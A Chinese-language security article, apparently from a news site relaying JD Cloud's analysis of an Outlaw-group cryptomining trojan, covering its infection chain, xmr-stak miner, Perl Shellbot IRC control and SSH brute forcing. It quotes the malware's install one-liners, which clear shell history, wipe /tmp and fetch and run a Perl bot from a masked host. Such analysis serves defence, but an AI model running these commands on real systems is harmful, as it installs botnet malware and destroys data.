當前位置：滾動 >

黃金礦工貨幣或將時代終結形態決定未來價格走勢

文章來源：財金網　發布時間： 2019-04-13 16:24:23　責任編輯：cfenews.com

+|-

【原標題：黃金礦工貨幣或將時代終結形態決定未來價格走勢】財金網消息 2009年，比特幣橫空出世。得益于去中心化的貨幣機制，比特幣受到許多行業的青睞，其交易價格也是一路走高。由于比特幣的成功，許多基于區塊鏈技術的數字貨幣紛紛問世，例如以太幣，門羅幣，萊特幣等。

這類數字貨幣并非由特定的貨幣發行機構發行，而是依據特定算法通過大量運算所得。而完成大量運算的工具就是挖礦機程序。

power by | 京東云安全能力與服務團隊

圖片來源：BBC NEWS

挖礦機程序運用計算機強大的運算力進行大量運算，由此獲取數字貨幣。由于硬件性能的限制，數字貨幣玩家需要大量計算機進行運算以獲得一定數量的數字貨幣，因此，一些不法分子通過各種手段將挖礦機程序植入受害者的計算機中，利用受害者計算機的運算力進行挖礦，從而獲取利益。入侵者只需要準備主服務器，即master服務器，將獲得服務器管理員權限以后的被入侵服務器轉化為從屬服務器，這樣就形成了一個具有超大計算能力的分布式挖礦集群，大大提高了他的收益。這類在用戶不知情的情況下植入用戶計算機進行挖礦的挖礦機程序稱為挖礦木馬。

挖礦木馬最早出現于2013年，2017年開始大量傳播。挖礦木馬傳播者瘋狂入侵企業網絡，利用企業IT資源實現零成本挖礦。而暗網平臺大量存在的非法交易，更是數字加密幣持續火爆的土壤。根據“卡巴斯基2018年度安全公告”中可以看出，挖礦木馬已經成為服務器遭遇的最嚴重的安全威脅之一。

圖片來源

Kaspersky Security Bulletin 2018. Story of the year: miners

為了更好地讓大家了解如何防范“挖礦木馬”，今天我們給大家整理了一個典型的排查“挖礦木馬”入侵的流程分析。

背景

發現近期云中部分主機出現挖礦行為，對發現的礦機及感染過程做出分析，此礦機目前比較活躍，同時腳本應該在持續更新中，并在互聯網中進行持續活躍的感染，使用的是Outlaw組織的工具，懷疑此惡意感染礦機程序非個人行為為組織性行為，并試圖隱藏真正身份。

攻擊矢量分析

感染過程

1 . C2服務器通過得到的用戶名與密碼登錄受害云主機；

2 . 受害云主機從C2服務器遠端下載perl腳本；

3 . 受害云主機安裝perl惡意程序與C2進行持久化通信；

4 . 通過IRC通信下載相關礦機程序及爆破程序并進行啟動運行；

5 . 受害云主機根據下載的ip地址和密碼表對云內部及外部主機進行暴力破解；

6 . 如果破解成功返回ip及口令結果；

7 . 通過IRC通信將ip及口令返回給C2服務器；

8 . 重復1~7過程進行多實例的感染。

感染過程相關使用樣本

Hello: 遠端C2服務器到本地運行測試，判斷環境是否符合運行條件

Rsync/t：perl可執文件，執行成功后與C2服務器建立IRC通信

Abc: 主運行shell腳本，自動化下載、安裝并啟動所有程序

Dota.tar.gz:包含礦機、爆破和IRC通信程序的整體壓縮包

Lan.sh: 啟動迷你程序（單獨的礦機壓縮包和單獨的爆破程序壓縮包）的shell腳本，自動化下載、安裝運行

Sslm.tar.gz:包含下載礦機執行腳本及爆破程序執行的腳本和爆破程序文件

Minloc.sh:礦機下載及運行的腳本

Ml.tar.gz:礦機運行程序壓縮包

程序執行過程

受害主機自動化安裝流程圖

完整程序運行流程圖

系統進程

輕量級安裝程序運行流程圖

完整惡意程序分析

文件結構

包括3個部分：

a:XMR挖礦程序

b:IRC與C2通信

c:SSH爆破程序

惡意程序執行過程分析

XMR挖礦程序分析

1、礦機簡介：

使用的開源xmr-stak礦機，一個高度可配置的Monero（XMR）礦機。

Git上開源地址：https://github.com/fireice-uk/xmr-stak

2、安裝過程：

通過從C2服務器中下載shell腳本執行，進行礦機下載和運行，此礦機已經是編譯完成的二進制文件，直接可以在對應的系統中運行，無需安裝編譯環境及依賴。

Abc執行腳本中關于礦機部分：

下載解壓后，執行init2腳本：運行a目錄下a腳本，同時添加定時任務。

a目錄下a腳本：生成upd腳本，賦予權限，執行upd腳本

Run腳本：使用下載的依賴lib庫，按照系統位數運行對應的礦機可執行文件，此處文件名設置為了混淆和隱藏自身運行進程。

礦池分析

由于此礦機具有高可配置性，所以礦機加載自行下載下來的配置文件config.txt與pools.txt

根據pools.txt文件，發現礦池地址和錢包地址：

進一步確認表明池地址目前已關閉，公共池和哈希值沒有更多信息站點。

此池配置指向荷蘭的VPS提供商（服務器名稱server12.offensiveservers.com，路由到AS50673 SERVERIUS - AS（NL））。VPS的被動DNS數據顯示它托管了許多域，看起來主機像是一個游戲服務器主機。懷疑這些活動參與者可能已經在這個提供商建立他們自己私有的礦業池基礎設施。

IRC與C2通信分析

通過安裝使用perl語言的rsync或t可執行文件與C2服務器進行通信，目前的感染樣本全部為黑客組織Outlaw使用的基于Perl Shellbot構建的IRC bot的變種。

安裝過程

unset HISTFILE && rm -rf /tmp/t* && cd /tmp && wget -q x.x.x.x/t && chmod +x && perl t

或unset HISTFILE && rm -rf /tmp/* && cd /tmp && wget -q x.x.x.x/rsync && chmod +x && perl rsync

樣本分析

樣本采用了perl的代碼（916行）混淆方式，通過Uuencode進行簡單的編碼混淆，目的主要為了避開特征檢測等反病毒設備及監控設備

原始樣本：

perl反混淆后，主要進行通信的函數：

執行過程

1、連接C2服務器：到C2的連接嘗試在感染后就出現了，并且是持續的。如果連接斷開，就重新連接：

2、感染后的TCP通信流：

通信流量說明惡意軟件會加入僵尸機的IRC信道，并分配給昵稱和服務器配置信息。修改DNS設置能夠確認有真實的攻擊目標參與其中。然后用PING/PONG通信來保持通信信道開啟。IRC服務器會發送PING消息，需要PONG消息響應來預防連接斷開。

3、后續動作：

在目標系統上運行后，IRC信道的管理員會發送不同的命令給被感染的主機。列表中含有執行端口掃描、DDOS、文件下載、信息獲取、發送操作系統信息和運行進程列表的命令。

IRC相關的函數使用了join, part, uejoin, op, deop, voice, devoice, nick, msg, quit, uaw, die等。

SSH爆破分析

啟動爆破流程

Start ? Aptitude ? run ? go ? tsm ? finish

Start執行腳本

指定路徑和將shell腳本輸出到指定文件運行

Aptitude執行腳本

切換到c目錄下執行run腳本

Run執行腳本

先停掉已經運行腳本，隨機時間執行go腳本

go執行腳本

首先清理已有文件，然后通過隨機數進行判斷去服務器獲取爆破使用的a(ip地址列表)和b(密碼列表)，使用隨機數方式主要還是為了逃避一些檢測和監控，下載完畢后重命名為ip和p，最后執行tsm爆破程序使用密碼列表對ip地址列表進行爆破，90分鐘超時，如果未正常執行完畢將強制KILL程序，刪除所有相關文件。

TSM程序

使用的是Outlaw組織之前使用過的haiduc工具。haiduc工具集變種用來暴力破解運行SSH服務的有漏洞的主機。

包含在32位與64位上分別能運行的二進制程序，同時帶有供其使用的lib的so庫，保證程序的正常運行。

更多新聞>>